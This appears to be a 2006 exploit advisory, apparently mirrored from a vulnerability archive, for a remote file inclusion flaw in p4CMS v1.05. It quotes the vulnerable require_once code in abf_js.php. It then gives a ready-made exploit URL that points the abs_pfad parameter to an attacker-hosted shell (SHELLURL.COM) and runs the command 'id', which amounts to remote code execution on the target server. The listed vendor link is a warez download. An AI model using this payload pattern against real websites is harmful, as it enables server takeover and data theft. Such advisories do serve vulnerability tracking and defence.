p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit

2006-09-1200:00:00

vulners.com

#==============================================================================================
#p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://warez.gtasoft.ru/skripts/p4CMS.v1.05.Nullified-WTN.rar

#Version : v1.05

#================================================================================================
#Bug in : abf_js.php

#Vlu Code :
#--------------------------------

@require_once($abs_pfad."include/config.inc.php");

@require_once($abs_pfad."include/mysql-class.inc.php");

@require_once($abs_pfad."include/functions.inc.php");

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/abf_js.php?abs_pfad=http://SHELLURL.COM?&cmd=id

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#GreetZ : CCtream - Cyper-worrier team

Special Thx To : Str0ke & simoo

==================================================================================================

JSON

p4CMS &lt;= v1.05 &#40;abs_pfad&#41; Remote File Inclusion Exploit

@require_once($abs_pfad."include/config.inc.php");

@require_once($abs_pfad."include/mysql-class.inc.php");

@require_once($abs_pfad."include/functions.inc.php");

Special Thx To : Str0ke & simoo

p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit